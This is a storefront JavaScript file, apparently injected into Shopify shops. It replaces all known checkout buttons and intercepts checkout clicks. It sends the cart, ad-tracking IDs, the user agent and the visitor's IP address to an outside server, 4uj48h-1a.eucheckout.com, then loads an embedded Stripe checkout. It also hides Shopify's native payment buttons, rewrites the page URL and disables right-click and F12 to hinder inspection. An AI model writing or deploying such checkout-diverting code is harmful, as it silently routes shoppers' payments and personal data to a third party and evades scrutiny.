const fontAwesomeLink = document.createElement("link");
const sa = document.createElement("script");
(sa.type = "text/javascript"), (sa.src = "https://cdn.jsdelivr.net/npm/sweetalert2@11"), document.head.appendChild(sa);



const queryString = window.location.search,
    urlParams = new URLSearchParams(queryString),
    hasOrderProcessingParam = urlParams.get("order-processing"),
    hasEuCoIdParam = urlParams.get("EuCoId");



async function saveAllDataToLocalStorage() {
    const queryString = window.location.search;
    const urlParams = new URLSearchParams(queryString);

    const TimeNow = Date.now();
    let data = {};

    let savedData = localStorage.getItem("utm");
    if (savedData) {
        data = JSON.parse(savedData);
    }


    for (const [paramName, paramValue] of urlParams.entries()) {
        data[paramName] = paramValue;
    }


    const fbclid = urlParams.get('fbclid');
    let igclid = urlParams.get('igclid');
    const referrer = document.referrer.toLowerCase();
    const isInstagram = referrer.includes("instagram.com");

    if (isInstagram && !igclid && fbclid) {
        igclid = fbclid;
    }

    if (fbclid) data['fbclid'] = fbclid;
    if (igclid) data['igclid'] = igclid;


    let fbClickId = fbclid || igclid || data['fbc'];
    if (fbclid || igclid) {

        data['fbc'] = "fb.1." + TimeNow + "." + fbClickId;
    } else if (!data['fbc']) {

        data['fbc'] = "fb.1." + TimeNow + "." + Math.round(2147483647 * Math.random());
    }


    if (!data['fbp']) {
        const fbPixelId = "fb.1." + TimeNow + "." + Math.round(2147483647 * Math.random());
        data['fbp'] = fbPixelId;
    }


    const ttclid = urlParams.get('ttclid');
    if (ttclid) {
        data['ttclid'] = ttclid;
    }


    let ttp = getCookie('_ttp');
    if (!ttp) {
        ttp = "ttp_" + TimeNow;
        setCookie('_ttp', ttp, 90);
    }


    data['ttp'] = ttp;


    const userAgent = navigator.userAgent;
    if (userAgent) data['client_user_agent'] = userAgent;

    try {
        const response = await fetch('https://api.ipify.org?format=json');
        const dataIp = await response.json();
        const ipAddress = dataIp?.ip;
        if (ipAddress) {
            data['client_ip_address'] = ipAddress;
        }
    } catch (error) {
        console.error("Failed to fetch IP address: ", error);
    }

    localStorage.setItem("utm", JSON.stringify(data));


    setCookie('_fbclid', fbclid || '', 90);
    setCookie('_fbp', data['fbp'], 90);
    setCookie('_fbc', data['fbc'], 90);
    setCookie('_ttclid', ttclid || '', 90);
    setCookie('_ttp', ttp || '', 90);
    setCookie('_ip', data['client_ip_address'] || '', 90);
    setCookie('_user_agent', data['client_user_agent'] || '', 90);


    function setCookie(name, value, days) {
        const expires = new Date();
        expires.setTime(expires.getTime() + days * 24 * 60 * 60 * 1000);
        document.cookie = `${name}=${value};expires=${expires.toUTCString()};path=/;SameSite=Lax`;
    }

    function getCookie(name) {
        const match = document.cookie.match(new RegExp('(^| )' + name + '=([^;]+)'));
        if (match) return match[2];
        return null;
    }
}

saveAllDataToLocalStorage();




function setId() {
    localStorage.EuCoId = hasEuCoIdParam;
}
if (hasOrderProcessingParam && hasEuCoIdParam) {

    // Immediately inject styles into head (works even before body exists)
    const styleContent = `
        @keyframes rotation {
            0% { transform: rotate(0deg); }
            100% { transform: rotate(360deg); }
        }
        
        body {
            margin: 0 !important;
            padding: 0 !important;
            height: 100vh !important;
            overflow: hidden !important;
        }
        
        .loader-overlay {
            display: flex !important;
            flex-direction: column !important;
            align-items: center !important;
            justify-content: center !important;
            height: 100vh !important;
            width: 100vw !important;
            position: fixed !important;
            top: 0 ! important;
            left: 0 !important;
            background-color: white !important;
            z-index: 2147483647 !important;
        }
        
        .spinner-circle {
            width: 60px !important;
            height: 60px !important;
            border:  5px solid #000 !important;
            border-bottom-color:  transparent !important;
            border-radius: 50% !important;
            display: inline-block ! important;
            box-sizing:  border-box !important;
            animation: rotation 1s linear infinite !important;
        }
    `;

    const style = document.createElement("style");
    style.textContent = styleContent;
    (document.head || document.documentElement).appendChild(style);

    // Wait for body to exist
    const waitForBody = setInterval(() => {
        if (document.body) {
            clearInterval(waitForBody);

            // Clear everything
            document.body.innerHTML = `
                <div class="loader-overlay">
                    <span class="spinner-circle"></span>
                    <p style="margin-top: 20px; font-size: 16px; color: #000;">Processing...</p>
                </div>
            `;

            // Clear cart
            async function rc() {
                try {
                    await fetch("/cart/clear.js");
                } catch (error) {
                    console.error("Error clearing cart:", error);
                }
            }

            function getId() {
                document.cookie = "cart=;expires=2021-12-19T15:12:13.000Z";
                return localStorage.getItem("EuCoId");
            }

            setId();
            rc();

            // Fetch order process
            (async function fetchOrderProcess() {
                try {
                    const res = await fetch(`https://${subdomain()}.${server()}/api/v1/order-process/${getId()}`);
                    const response = await res.json();

                    if (response?.rf === true) {
                        setTimeout(fetchOrderProcess, 2000);
                    } else if (response?.typl) {
                        localStorage.removeItem("utm");
                        window.location.href = response.typl;
                    } else {
                        Swal.fire({
                            title: response?.message,
                            icon: "error"
                        });
                    }
                } catch (error) {
                    console.error("Fetch error:", error);
                }
            })();
        }
    }, 10);
}



let intervalID;

async function stripe_checkout(replacement) {
    let shopDomain = window.Shopify.shop;
    let utmGet = localStorage.getItem('utm');
    intervalID = null;

    try {
        let origin = window.location.origin;
        let cartRes = await fetch(`${origin}/cart.js`);
        let cartJson = await cartRes.json();

        cartJson.country = typeof getGeo === "function" ? await getGeo() : "";

        try {
            cartJson.utm = utmGet ? JSON.parse(utmGet) : {};
        } catch {
            cartJson.utm = {};
        }

        cartJson.str = shopDomain || "";

        const abortController = new AbortController();
        const abortTimeout = setTimeout(() => {
            abortController.abort();
            window.location.href = "/checkout";
        }, 5000);

        let apiRes;
        try {
            apiRes = await fetch(`https://${subdomain()}.${server()}/api/v1/checkout/payment`, {
                method: "POST",
                headers: { "Content-Type": "application/json" },
                body: JSON.stringify(cartJson),
                signal: abortController.signal
            });
        } finally {
            clearTimeout(abortTimeout);
        }

        let apiJson = await apiRes.json();



        if (!apiRes.ok) {
            throw new Error(`HTTP ${apiRes.status}`);
        }
        if (apiJson.type) {
            // ===== ERROR BRANCH =====
            replacement.disabled = false;
            replacement.innerText = "Reload & Try Again...";

            // ensure an error container exists right after the button
            let errP = document.getElementById("errorMessage");
            if (!errP) {
                errP = document.createElement("p");
                errP.id = "errorMessage";
                errP.style.color = "red";
                errP.style.display = "block";
                replacement.parentNode?.insertAdjacentElement?.("afterend", errP);
            }
            errP.innerText = `${apiJson?.raw?.message.split("(", 1)}`;

            Swal.fire({
                icon: "error",
                title: "Error...",
                color: "red",
                confirmButtonColor: "#3085d6",
                text: `${apiJson?.raw?.message.split("(", 1)}` || "Something Went Wrong...",
                allowOutsideClick: false,
                confirmButtonText: 'OK'
            }).then((result) => {
                if (result.isConfirmed) {
                    window.location.reload(); // Reload the page
                }
            });

            console.log(apiJson?.raw?.message);
        } else if (apiJson?.cmode == "em") {
            // ===== EMBEDDED CHECKOUT BRANCH =====
            const { clientSecret } = apiJson;
            const body = document.body;
            const html = document.documentElement;

            while (body.firstChild) {
                body.removeChild(body.firstChild);
            }

            // Reset all styles that might interfere with scrolling
            html.style.cssText = `
                margin: 0;
                padding:  0;
                height: 100%;
                overflow: visible;
            `;

            body.style.cssText = `
                margin: 0;
                padding: 0;
                height: auto;
                min-height: 100%;
                overflow: visible;
                position: relative;
            `;

            // === Header Container ===
            const headerContainer = document.createElement('div');
            headerContainer.style.cssText = `
                position: relative;
                display: flex;
                justify-content: center;
                align-items: center;
                height: auto;
                padding: 0 15px;
                border-bottom: 1px solid #eee;
                background:  #fff;
                box-shadow: 0 2px 5px rgba(0,0,0,0.02);
                margin:  0;
            `;

            const logo = document.createElement('img');
            logo.src = window?.shopLogoUrl?.includes("no-image")
                ? "https://i.ibb.co/0R4qf44G/Transaprent-logo.png"
                : `${(window?.shopLogoUrl)}`;
            logo.alt = "Logo";
            logo.style.cssText = `
                height: 60px;
                max-width: 100%;
                object-fit: contain;
                margin:  10px auto;
                display: block;
            `;
            headerContainer.appendChild(logo);

            // === Back Button (Absolutely Positioned) ===
            const goBackBtn = document.createElement('button');
            goBackBtn.innerHTML = '<img src="https://i.ibb.co.com/rKPVqrqk/shopping-bag-1.png" style="width:24px; height:auto;" />';
            goBackBtn.onclick = () => window.location.href = "/cart";

            goBackBtn.style.cssText = `
                position: absolute;
                left:  12px;
                top:  50%;
                transform: translateY(-50%);
                padding: 6px 16px;
                background: #fff;
                border: 1px solid #ddd;
                border-radius: 8px;
                font-size: clamp(12px, 4vw, 15px);
                font-weight:  600;
                cursor: pointer;
                box-shadow: 0 2px 8px rgba(0,0,0,0.04);
                transition: background 0.2s, border 0.2s;
            `;

            goBackBtn.onmouseover = () => {
                goBackBtn.style.background = "#f7f7f7";
                goBackBtn.style.border = "1px solid #bbb";
            };
            goBackBtn.onmouseout = () => {
                goBackBtn.style.background = "#fff";
                goBackBtn.style.border = "1px solid #ddd";
            };

            headerContainer.appendChild(goBackBtn);
            body.appendChild(headerContainer);

            // === Checkout Section ===
            const host = window.location.origin;
            const url = `${host}?pay/checkout/${[...crypto.getRandomValues(new Uint8Array(100))]
                .map(b => 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789'[b % 62])
                .join('')}`;
            window.history.replaceState(null, '', url);

            const checkoutDiv = document.createElement('div');
            checkoutDiv.id = 'mo';
            checkoutDiv.style.cssText = `
                margin: 0;
                padding: 0;
                width: 100%;
                height: auto;
                min-height: calc(100vh - 80px);
            `;
            body.appendChild(checkoutDiv);

            const chk = await stripe.initEmbeddedCheckout({ clientSecret });
            chk.mount('#mo');

            // Force reflow after mount to ensure Stripe calculates heights correctly
            setTimeout(() => {
                window.scrollTo(0, 0);
            }, 100);

        } else {

            replacement.disabled = false;
            replacement.innerHTML = ""; // remove loader
            replacement.textContent = replacement.dataset.originalText || "Checkout";

            if (apiJson?.url) {
                requestAnimationFrame(() => {
                    window.location.href = apiJson.url;
                });
            }
        }
    } catch (err) {
        console.log(err);
        window.location.href = "/checkout";
        replacement.innerText = "Reload & Try Again...";
        replacement.disabled = true;
    }
}

function applyCheckoutLoadingState(targetEl) {
    if (!targetEl) return;

    const currentText = targetEl?.innerText?.trim() || targetEl?.textContent?.trim() || "Checkout";
    targetEl.dataset.originalText = targetEl.dataset.originalText || currentText;
    targetEl.disabled = true;
    targetEl.innerHTML = "";

    // Keep spinner centered even when merchants use heavily customized button styles.
    targetEl.style.display = "flex";
    targetEl.style.alignItems = "center";
    targetEl.style.justifyContent = "center";

    const loader = document.createElement("span");
    loader.className = "loader";
    loader.innerHTML = `
        <svg viewBox="0 0 24 24" xmlns="http://www.w3.org/2000/svg">
            <style>
                .spinner_z9k8 {
                    transform-origin: center;
                    animation: spinner_StKS .75s infinite linear;
                    fill: #ffffff;
                }
                @keyframes spinner_StKS {
                    100% { transform: rotate(360deg); }
                }
            </style>
            <path d="M12,1A11,11,0,1,0,23,12,11,11,0,0,0,12,1Zm0,19a8,8,0,1,1,8-8A8,8,0,0,1,12,20Z" fill="#ffffff" opacity="0.25"/>
            <path d="M12,4a8,8,0,0,1,7.89,6.7A1.53,1.53,0,0,0,21.38,12h0a1.5,1.5,0,0,0,1.48-1.75,11,11,0,0,0-21.72,0A1.5,1.5,0,0,0,2.62,12h0a1.53,1.53,0,0,0,1.49-1.3A8,8,0,0,1,12,4Z" class="spinner_z9k8"/>
        </svg>
    `;
    targetEl.appendChild(loader);
}

intervalID = setInterval(function () {

    // Add minimal CSS once
    if (!document.querySelector("#custom-loader-css")) {
        const style = document.createElement("style");
        style.id = "custom-loader-css";
        style.textContent = `
          .loader {
              width: 24px;
              height: 24px;
              display: inline-flex;
              align-items: center;
              justify-content: center;
              margin: 0;
              padding: 0;
          }

          .loader svg {
              width: 24px;
              height: 24px;
              display: block;
          }
        `;
        document.head.appendChild(style);
    }
    //.styles_Footer__checkoutButton__, .styles_CustomButton__, .upcart-checkout-button,
    const elements = document.querySelectorAll('.upcart-checkout-button, .moonbundle-cart-drawer-checkout, .opus-btn-checkout, .opus-price, .title-checkout-opm, .cd-layout-button-checkout, .cd-main-button, #opus-checkout-btn, .slide-cart-checkout-btn, [name="checkout"], [id="checkout"], [id="cart-sidebar-checkout"], [id="CartDrawer-Checkout"], [form="CartDrawer-Form"], a[href="/checkout"], a[href="checkout"], a[href="/checkout/"], a[href="checkout/"], a[href="en/checkout"], [sc="checkout"], button[sc="checkout"], a[sc="checkout"]');

    elements?.forEach((e) => {
        if (e.tagName === "BUTTON" && e.getAttribute("sc") === "checkout") return;

        const text = e?.innerText?.trim() || e?.textContent?.trim() || "Checkout";
        const originalClass = e?.className || "";
        const originalStyle = e.getAttribute("style") || "";

        const replacementDiv = document.createElement("button");
        replacementDiv.setAttribute("sc", "checkout");
        replacementDiv.className = originalClass;
        if (originalStyle) {
            replacementDiv.setAttribute("style", originalStyle);
        }

        replacementDiv.textContent = text;

        replacementDiv.addEventListener("click", function (t) {
            t.preventDefault();
            applyCheckoutLoadingState(replacementDiv);

            if (typeof stripe_checkout === "function") {
                stripe_checkout(replacementDiv);
            }
        });

        e?.parentNode?.replaceChild(replacementDiv, e);
    });

}, 100);

// Plan B: capture checkout clicks before theme/app scripts can redirect to /checkout.
document.addEventListener("click", (event) => {
    const matched = event.composedPath().find((el) => {
        return el?.matches?.(
            '[class*="upcart-checkout-button"], [class*="opus-btn-checkout"], .opus-price, .moonbundle-cart-drawer-checkout, .title-checkout-opm, .cd-layout-button-checkout, .cd-main-button, #opus-checkout-btn, .slide-cart-checkout-btn, [name="checkout"], [id="checkout"], [id="cart-sidebar-checkout"], [id="CartDrawer-Checkout"], [form="CartDrawer-Form"], [sc="checkout"], a[href="/checkout"], a[href="checkout"], a[href="/checkout/"], a[href="checkout/"], a[href="en/checkout"]'
        );
    });

    if (!matched) return;

    event.preventDefault();
    event.stopImmediatePropagation();
    event.stopPropagation();

    if (matched.disabled) return;

    applyCheckoutLoadingState(matched);

    stripe_checkout(matched);
}, true);


function subdomain() {
    let url = "4uj48h-1a";
    return url
}
function server() { let server = "eucheckout.com"; return server; }


document.addEventListener('contextmenu', function (e) {
    e.preventDefault();
});

document.addEventListener('keydown', function (e) {
    if (e.key === 'F12') {
        e.preventDefault();
    }
});




            var css = 'div[data-shopify="payment-button"]{ display: none !important; } div[data-shopify="dynamic-checkout-cart"]{ display: none !important; }'
            var style = document.createElement('style');
            style.type = 'text/css';
            if (style.styleSheet) {
                style.styleSheet.cssText = css;
            } else {
                style.appendChild(document.createTextNode(css));
            }
            document.head.appendChild(style);
        